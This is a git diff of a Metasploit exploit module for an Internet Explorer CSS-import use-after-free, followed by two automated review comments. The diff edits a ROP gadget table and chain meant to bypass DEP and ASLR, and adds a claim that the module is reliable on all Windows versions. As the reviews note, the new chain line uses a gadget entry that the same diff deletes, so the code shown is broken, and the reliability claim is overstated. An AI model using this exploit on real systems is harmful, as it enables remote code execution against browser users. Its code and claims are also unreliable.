diff --git a/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb b/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
index b8a13c6a0b..47986ed1dc 100644
--- a/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
+++ b/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
@@ -33,6 +33,11 @@ class Metasploit3 < Msf::Exploit::Remote
 HTML engine (mshtml). When parsing an HTML page containing a recursive
 CSS import, a C++ object is deleted and later reused. This leads to
 arbitrary code execution.
+
+ This exploit utilizes a combination of heap spraying and the
+ .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
+ opt-in to ASLR. As such, this module should be reliable on all Windows
+ versions.
 },
 'License' => MSF_LICENSE,
 'Author' =>
@@ -288,6 +293,7 @@ EOS
 elsif request.uri =~ /\.dll$/
 print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
+
 # Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
 # use it's contents ...
 ibase = (0x2000 | rand(0x8000)) << 16
@@ -330,11 +336,7 @@ EOS
 'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret' => 0x575b,
 'leave / ret' => 0x25e5,
 'ret' => 0x25e5+1,
- 'mov eax, [eax] / ret' => 0x22a2,
- 'mov [ecx], eax / xor eax, eax / pop esi / ret' => 0x360b9,
- 'call [ecx] / pop ebp / ret 0xc' => 0x1ec4,
- 'push eax / ret' => 0x1d1e4,
 'pop eax / ret' => 0x5ba1,
 'pop ebx / ret' => 0x54c0,
 'pop ecx / ret' => 0x1e13,
@@ -342,7 +344,6 @@ EOS
 'pop edi / ret' => 0x2212,
 'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc' => 0x61f6,
 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' => 0x6154,
- 'call [ecx]' => 0x1ec4
 }
 end
@@ -389,7 +390,7 @@ EOS
 rop_stack << 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret'
 }
 # Execute the payload ;)
- rop_stack << 'call [ecx]'
+ rop_stack << 'call [ecx] / pop ebp / ret 0xc'
 rop_stack.map! { |e|
 if e.kind_of? String
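Review bot: In the added description text, `This module does not opt-in to ASLR` is ambiguous because the preceding sentence has just used "module" for the .NET 2.0 'mscorie.dll' image, so a reader may take the subject to be this Metasploit module rather than the DLL whose non-randomised base the technique relies on; if the DLL is meant, say so directly, e.g. `mscorie.dll does not opt in to ASLR, so its base address is predictable.` The closing claim that the module "should be reliable on all Windows versions" is unconditional, while the text itself makes the technique depend on that .NET 2.0 DLL being present; consider qualifying it with the conditions the module actually depends on (the supported target list and the .NET 2.0 requirement) so operators and defenders reading the description are not misled about scope. The `%q{ }` description string begins before this hunk.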
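Review bot: The key pushed on the new line, `rop_stack << 'call [ecx] / pop ebp / ret 0xc'`, is exactly the gadget-table entry the third hunk deletes, and the fourth hunk deletes the `'call [ecx]'` entry that the old line used, so after this commit neither spelling appears in the portion of the table visible in the diff. Unless that key is still defined in a part of the hash outside these hunks, the lookup performed by the `rop_stack.map!` block that follows will resolve the string to nil, and the chain will be assembled from a missing element with an unhelpful failure far from the cause. Whichever table entry is intended to remain should be kept in step with this line, and the lookup should fail fast with a descriptive error when a name has no entry (the hash's name is not visible in this hunk, but a guard of the form `raise ArgumentError, "unknown gadget: #{e}" unless table.key?(e)` at the top of the String branch would do it). The `map!` block and the enclosing method continue outside the hunk.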